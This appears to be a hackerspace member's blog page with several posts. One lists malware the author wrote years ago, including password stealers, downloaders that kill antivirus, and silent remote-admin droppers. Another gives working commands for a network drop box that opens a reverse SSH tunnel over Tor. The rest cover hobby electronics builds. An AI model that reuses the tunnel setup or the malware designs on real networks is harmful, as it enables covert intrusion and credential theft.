Old Code

By | |
Leave a comment

This is just a post to preserve some old backdoor programs i wrote 10+ years ago that I used to mischievously learn programming and windows API. I no longer have the source for anymore. If I can dig them up I’ll post with the binaries.

Acid Reign 1.0
Coded in ASM 9/2001
First program I wrote was a webdownloader , the client was in Visual Basic and the server was in ASM
Acidreign
version 2.0 coded in ASM 5/9/2002
Acidreign2.0

trILLian rape ver. 1.0
Coded in ASM 4/27/2002
a 2.45kb trillian pws thats sends user names and passwords to your icq number.
Trillianrape1.0

ILL-Eagle 1.0
Coded in ASM 5/20/2002
a 1.62kb webdownloader that will download any Visual Basic file from a website and execute it. works on win9x/me/nt/2k/xp
*checks to see if Msvbvm60.dll is in the system directory ,if not it dlls it
*once downloaded runs the file hidden
*melts itself after file is downloaded removing any traces of itself
Ill_eagle1.0

mini-web vers. 1.0
Coded in ASM 6/2/2002
a 1kb webdownloader that will download any file from a website and execute it.works on win9x/me/nt/2k
Miniweb1.0

kILLer webdlr vers. 1.0
Coded in ASM 6/12/2002
a 3.1kb webdownloader that will download any file from a website and execute it.also kills any AV’s and firewalls running works on win9x/me/nt/2k/xp
Webdownloader_killer1.0

Shut-it Downloader vers. 1.0
Coded in ASM 6/17/2002
a 3.5kb webdownloader that will download any file from a website and execute it.also kills any AV’s and firewalls running works on win9x/me/nt/2k/xp
Webdownloader_shut-it1.0

half life jacker ver. 1.0
Coded in ASM 10/19/2002
a 1.35kb app thats sends half life cd-key to your icq number.
Halflifejacker1.0

WebcamNow Jacker
Coded in ASM 6/2003
Snags the saved password from the registry and sends it to an ICQ number
Webcamnow

CMDGet 1.0
Coded in ASM 8/2003
Downloads a file from a website from user provided parameters from the commandline/dos prompt/shell
Directions:
type: CMDGet

CMDGet 1.0
Coded in ASM 9/2003
a 1.26kb program that silently installs Radmin on a remote computer for win9x/me/nt/2k/xp. basically it downloads the radmin server and dll from the web and adds the proper registry keys for it to function.
Ghost_radmin1.0

NCWrapper 1.0
Coded in ASM 1/30/04
Automatically expands Netcat to the windows directory and executes user-choosen parameters *self-deletes after expanding/running commands (netcat is left running)
Ncwrapper1.0

mini-web vers. 2.0
Coded in ASM 2/10/04
a 1.5 kb webdownloader. Compressed with FSG it is only 977bytes. works on win9x/me/nt/2k
Miniweb2.0

Ghost Radmin 2.1
Coded in ASM 6/15/2004
a 1.24kb program that silently installs Radmin on a remote computer for win9x/me/nt/2k/xp. basically it downloads the radmin server and dll from the web and adds the proper registry keys for it to function. (default port is 4899 and pass is LetMeIn )
Ghost_radmin2.1

Ghost Radmin Generator 1.0
Coded in ASM 10/6/04
Generates a dropper that silently installs Radmin on a remote computer for win9x/me/nt/2k/xp.Extracts the radmin server and dll from itself and adds the proper registry keys for it to function.(default pass is 12345678). Self-deletes after installing Radmin.
Ghost_radmin1.0gen

To Catch a Thief – CarDuino Alarm

By | | ,
Leave a comment

Due to my car getting broken into 2 times in the past few weeks, I decided to use the opportunity to make a project out of it. One of our members had bought a Seeed Studio GPRS Arduino shield last year for a project but it was sitting around collecting dust so I asked him if i could borrow it.

The device uses an unlocked SIM card to send out sms text messages. (Can also be used for voice and data too). I worked with a few guys at NESIT to figure out the best plan to trigger the device. Our option was to connect the interior light to pin2 on the Arduino so that when the light turned on the 12volts would trigger the shield to send the SMS. Also added a 10kΩ resistor inline to drop the voltage down to so it wasn’t feeding a full 12v back into the Arduino. To power the device i was originally going to go with a 9v battery but since my cars cigarette lighter stays on when the car is off I decided to use this to power the device so I didnt have to worry about the 9v battery dying.

So hacking up an old phone charge wire I then used a perf board to solder together a 0.1uF capacitor and a LM7805 voltage regulator to drop the voltage from 12v to 5v to feed into the Arduino. Also added a 5.1k. resistor to ground. This is the design that member Cobey had drawn up for the connections.

The SIM card that he had no longer worked since it was over a year so I stopped by Walmart and bought an AT&T gophone SIM card for $10 and a recharge/refill card for $15. It was as simple as calling the number provided on the package and putting in the refill card pin info, and giving the GPRS shield’s IMEI printed on the SIM900 chip.

So after a few tests I finally got it working, so all’s i need to do is hook it up to my lighter, then hook pin2 up to my interior light underneath the dash

When my original $15 is up AT&T said I can convert my gophone plan over to text only for $5/month, so its pretty cheap.

If you would like to build a similar device the cheapest ive seen for an arduino clone is $13.50 ::HERE::

And for the GPRS Shield was $30 ::HERE::

Find yourself a nice case for them (I ended up using a weatherproof AT&T DSL box) and you’ll be off and running for about $70 total including the SIM card and first month.

The Arduino source code is available ::HERE:: you just need to change the phone number to your own number and upload it to your Arduino.

Thanks to Cobey,Devin, and Gary for helping out with the project, one of the great things about a hackerspace is you have people to turn to when you have questions. I’ll be updating soon with results if my device is triggered :)

Over Engineered Fishtank

By | |
Leave a comment

So before our move into the new NESIT hackerspace, one of our old members had made a mineral oil based fish tank.
When we were vandalized the fish tank was damaged, essential pushed off the desk onto the floor where it smashed the tank. While cleaning it up I checked the motherboard etc to see if they still worked. They fired up with no issue :) .

So I decided that it needed a new home and brought in a 5 gallon tank from home that wasn’t being used. Unfortunately for me I didn’t take into factor the cost of mineral oil (roughly $23/gallon) So $100 later i had enough mineral oil from a local Feed store. We wanted to use the computer as our login computer for guests to leave their contact info when visiting the space. I didn’t want the computer on a desk again and opted to build a L-shaped half-wall to house the entire project.

We had some 2×3′s laying around from a kitchen project that never happened so i decided to use those. Upon building the frame for it i notice half of the board were either severely warped or twisted. I tried to compensate for the curves by cutting and measuring from those. Bad move on my part, the thing was hideous looking.

Decided to scrap that design and start new, had a friend come by that help start the frame again, this time trying to bend the boards into place to straighten them.

Now that the frame was pretty much done I started looking into the leftover supplies from the old woodworking shop that we moved into. We had some nice wood paneling in the pile of wood so I used that for the sides and tacked on some thin molding wood to They also had plenty of counter top Formica and mdf boards so i decided on going with a nice clean design for the top, the hardest part of the hole design was the cement support beam was in the way where the counter met the wall, so i had to curve the top and the Formica to accommodate it. Bought a quart of contact cement to adhere the Formica to the wood, then using a router we carved out around the Formica to make the top and sides meet with a nice edge.
Next thing to do was to wire up the outlets for the fish tank lights and the computer.

Finally added some accent LED lighting underneath the top

So the total cost of the project (besides the $100 in mineral oil) was only about $30 , since we had most of the wood and formica left over from the previous tenants. Thanks to my Uncle John for helping with the build.

TODO: Still have to finish shelving on the back of the halfwall, it’ll house our video game consoles (NES, Super NES, Atari 2600, PS2, Xbox, NEO GEO) on pull out shelves.

MiniPwner – Evil Network Dropbox

By | | , ,
Leave a comment


The MiniPwner is a penetration testing “drop box”, it is a small, cheap, and simple but powerful device that can be inconspicuously plugged into a network and provide the penetration tester remote access to that network. I purchased this device for a project here @ NESIT and thought it packed quite a punch for only $23, compared to the pwnie express plugs which run upwards of $500. And at that price you could afford to lose one or two on a pentesting job and not be hurting :p

Some of the features of the minipwner include:

Atheros 400MHz MIPS CPU
32MB RAM
4MB flash
10/100Mbps Ethernet interface
802.11b/g/n wireless interface with one internal antenna
USB 2.0 port
Micro-USB power socket, approximately 1W power draw
5.7cm x 5.7cm x 1.8cm dimensions
Nmap network scanner
Tcpdump sniffer
Netcat Hacker’s swiss army knife
aircrack Wireless network analysis
kismet Wireless network analysis
perl Perl Scripting Language
openvpn VPN Client and Server
dsniff suite of sniffing and spoofing tools, including arpspoof
nbtscan NetBIOS Network Scanner
snort Sniffer, Packet Logger, Intrusion Detection System
karma Wireless Sniffing Tool
samba2-client Windows File Sharing Client
elinks Text Based Web Browser
yafc FTP Client
openssh-sftp-client Secure File Transfer Client

So after doing the initial install of open-wrt firmware and configurations for the other applications I came across an awesome article on SecurityGeneration.com which described some james bond type shit of having your pwnie express connect back to you over tor so you would essentially be untraceable. Instead of having it connect back through ssh to your IP address you would be connecting back to a tor *.onion address. But since I dont have a pwnplug the only problem that lied ahead was to convert the instructions to work on this minipwner box. Now im not an expert on getting this shit configured properly so i relied on some help from friends and general guessing to get it up and running, so your mileage may vary.

I’m not going to rehash getting minipwner onto the tp-link here, so i’ll pick up where his article left off. And im not going to rehash getting your tor hidden server running, follow step 1. on SecurityGeneration’s article if you need to figure it out.

First thing I did was get tor installed on the USB drive (which should already be setup with the original instructions on the minipwner site)

opkg -dest usb install tor-geoip

then symlink it

ln -s /mnt/usb/usr/share/tor /root/.tor

edit the tor config file

vi /etc/tor/torrc

Scroll to the bottom and change User tor to User root
next find DataDirectory /var/lib/tor and change it to /mnt/usb/usr/share/tor/lib then save the config file. This changes the logging to the USB drive, otherwise tor will start and start writing to the minipwners flash memory and soon it’ll be full. You should be able to start tor with no errors by typing tor. as long as it work you might wanna have tor start when the minipwner powers up.

add tor to default run level (startup):

cd /etc/rc.d
ln -s ../init.d/tor S99tor

Now the hardest part of the instructions was to wget connect.c and compile it. By default open-wrt doesn’t have anything to compile programs in their repository, so it’s a clusterfuck because you need to do to cross-compile connect.c for the minipwners MIPS architecture on another box using the toolchain shit , then send it over to you minipwner and pray that it works. Luckily I already went though this and have binary ::here::. I’ll write more about doing this at a later time. So, all’s you need to do is:

wget http://nesit.org/files/connect
mkdir /usr/local/
mkdir /usr/local/bin/
mv connect /usr/local/bin/connect
chmod 755 /usr/local/bin/connect
chown root.root /usr/local/bin/connect

Now we need to get open-ssh on the minipwner:

opkg -dest usb install openssh-client-utils

Then we need to edit the ssh config file

vi /etc/ssh/ssh_config

add these 2 line to the bottom and save the config:

Host *.onion
ProxyCommand /usr/local/bin/connect -S localhost:9050 %h %p

Then I made a simple script to automate it to connect back to your hidden tor server
just change the blablablabla.onion to your .onion address and the ssh_user to your username

vi reversessh.sh

#!/bin/sh
Rec_Port=22
Remote_Tor=blablablabla.onion
SSH_user=anonymous
SSH_key=”/root/.ssh/id_rsa”
/mnt/usb/usr/bin/ssh -NR 3330:localhost:22 -i “$SSH_key” “$SSH_user”@”$Remote_Tor” -p “$Rec_Port”;

then save and chmod

chmod 0755 reversessh.sh

If all goes well you should be able to

./reversessh.sh

and on your tor hidden server you can just run watch “netstat -lntup” you should see:

tcp 0 0 127.0.0.1:3330 0.0.0.0:* LISTEN 15007/sshd: anonymous

You should be able to

ssh root@localhost -p 3330

you should be connected to your minipwner over tor 🙂

If anyone has anything to add/fix to this please hit me up illwill at illmob.org. Thnx to |m| & inhibit for help on getting this working.

RFPiD – Raspberry Pi Access Control

By | | ,
Leave a comment

We’ve been working on our new door entry system for NESIT that will allow members to enter the space through our sliding door. This will replace our current Arduino RFID door access system. It utilizes a RFID card reader that checks the tag against a SQLite database then opens the door by triggering a 5v relay connected to a garage door opener. It also tweets when someone arrives @ the space to Twitter.com as well as logging the arrival into the database. Connected to the front of the device is a small 4.5 lcd screen connected by s-video port that plays videos when someone scans their card.

The door can also be controlled over GoogleTalk with multiple google accounts. An authorized user can open and close the door, add or remove users from the database, query the database accounts, check the current temperature, callerID lookups, geoIP lookups, play sounds/videos, and send messages to it’s twitter account. All this can be done right from your cell phone or laptop.

The door also has a PIR sensor that will sense when someone’s walking by and asks them to press the pushbutton on the front if they want to learn more about NESIT. When they press it, it’ll play a short promo video about us.

nesitpi

A sample of the base RFPiD python code is available here: Github

The idea:
This project came out of necessity. With the amount of members we have, it made more sense to make an automated door access system, than to give everyone keys. We originally used an Arduino for the last 2 years, but we wanted to be able to control the database of users easier, our current setup wrote the users to the eeprom of the Arduino. We were thinking about using an ethernet module to talk with a server on our network but if our network had issues that would prevent someone from entering. The small footprint of the Pi makes it a better choice than to run a server fulltime. Our modest server burns through around $200 a year worth of electricity. By comparison a Raspberry Pi consumes about $3 per year. With the Raspberry Pi we could now have ethernet capabilities, could store its own database, gpio pins , video output and more.

Starting the project I needed to figure out how to interface a RFID reader with the Pi. I wanted to interface it with the UART pins but due to time constraints I ended up using a sparkfun USB adapter with my Innovations ID-20 RFID reader. The only thing I has to do was monitor the USB in /dev and receive the RFID tag ID when someone scanned their card. To do this I used python script that monitored serial connection on /dev/ttyUSB0 the base of the script which I have posted to my github account and used a sqlite3 database to verify if the card scanned was a valid member, if so it would trigger the door. Also used a RGB LED to notify if the card was good or not.

With the RFID stuff working it was time to pick out a good enclosure. We had a few old outdoor phone boxes laying around the space, these are the same ones you would commonly see being used for phone service hookup outside of your house. These were perfect because the plastic is thick and sturdy and you are able to lock the case. The first thing we had to do was gut the inside, which consisted of removing the electronics and dremeling the plastic to fit everything inside the box.

phoneboxphonebox2

Since the Pi supported S-video out, I found a cheap 4.5” LCD screen on Amazon that was from a car backup camera system that had S-video inputs. I cut out the front of the box and fit the screen into place. So now when someone entered it would play a video corresponding to that user.
phonebox3phonebox4

I also started modding a python script for GoogleTalk from mitchtech.net that allowed me to control the Pi from my Android phone by sending it commands. I also added code to it to allow multiple bot admins, allow me to add/remove/modify users in the RFID card database, check the current temperature, callerID lookups and geolocate IP addresses. Also added Twitter capabilities , so when someone entered the space , the Pi would tweet who entered and what time. Which served as sort of a backup to our entry log, and let other members know who was currently at the space.

nesitpi

Originally I was going to use a 12v door actuator with our normal door, which you will see if some of the videos, but we also had a sliding door that one of our members decided to hook up to a garage door opener to. So now all I had to do was interface the garage door trigger with a 5v relay. I also added a arcade button so members can open the door from inside the space.
garagedoorarcadebutton

I added a tamper button inside that would send out an email alert if someone tried to open the case, it also curls an image from the IP camera we have outside the door. Another button in front that would play a promo video when someone pressed it. The final thing I installed was a PIR sensor, It would wait for movement , such as someone walking by, and beckon them to press the button to play a randomly picked NESIT promo video.

The power for the device was a power supply for an external hard drive. The great thing about it is that it outputs 5v and 12v natively so I didn’t have to muck around with stepping the voltages up or down. You can get one on eBay etc for about $7. This helped because the LCD screen runs on 12v and the other components run off 5v. I installed a mounting block inside to help run all the wires to each device.

RFPiD-inside3RFPiD-frontRFPiD-front2RFPiD-insideRFPiD-inside2

All the python code and C code runs from bootup and/or cron jobs that check to see if the files are running and restart them if needed to keep the device running perfectly.

In total the project was around $160
$40 for PI
$50 for RFID and USB breakout board
$20 for LCD
$30 for used garage door opener
$3 for PIR sensor
$10 for wiring,4gb SD card, LEDs, and resistors
$4 for Temp sensor

To be continued….

PirateBox

By | |
Leave a comment

The PirateBox is a device designed to facilitate sharing, you need to be close enough to connect via WiFi to this portable file server. PirateBox is designed to be private and secure. No logins are required and no user data is logged. Users remain completely anonymous – the system is purposely not connected to the Internet in order to subvert tracking and preserve user privacy. It can be used anywhere, it runs on batteries, usb, or by power cord.

We had an old Fonera router laying around collecting dust so we decided to put it to good use as a Piratebox. Our first step was to try to find a suitable case , we found a used oldschool domed lunchbox on ebay, we decided to try to bid instead of buy it now, not realizing there was such a demand for the lunchbox, someone finally outbid us for more than the lunchbox went for new. So i did some more searching and found a plastic one on Amazon for $8

Being that it was plastic was good and bad; we didn’t need to worry about stuff grounding out, but it was ugly looking. We ended up getting some nice Krylon paint made for plastics that worked out very nice after some initial sanding, then sanding after a few coats. It had a nice old look to it.

Now for the Fonera router we had a few issues. It was donated to us by one of our members who worked for Fonera, they used to receive ‘bricked’ routers that people had tried and failed on installing open-wrt. So we acquired 4 of them a few yrs ago. Our first thing to do was to unbrick it, luckily for us this router was able to boot into redboot and we were able to push a new image over tftd. The routers WiFi is Atheros based so were grabbed the latest image from the openwrt trunk. After installing the new image all we had to do was wget the Piratebox install, update a few dependencies and we were off and running.

We mounted the routers board inside on a small block of wood with some bolts to hold it into place, and we were able to use the old case to figure out the spacing of the usb port, network ports and power port, we carefully used a Dremel tool to cut out the plastic. The reason for the components on the outside is because we’re wanted easy access to the port for future project and also not having to worry about opening and closing the top all the time.

We also fashioned a usb power cable and a AA battery pack to power the device when we use it for public events.

Since the fonera has a usb port we were able to mount it and use a low-profile 16usb flash drive to hold our uploaded files. So far we have uploaded a few public domain files to the device, but anxiously await to see what people will be uploading.


SlapBoxing

By | |
Leave a comment

slapboxing
A small program in MASM that simulates the old phone blue box (MF tones) & DTMF tones. It essentially plays the tones from .mp3 files that have been modified to act like .wav files so the file size is small. They are then embedded in the application as a resource. You just press the button to hear the tone. Download it ::HERE::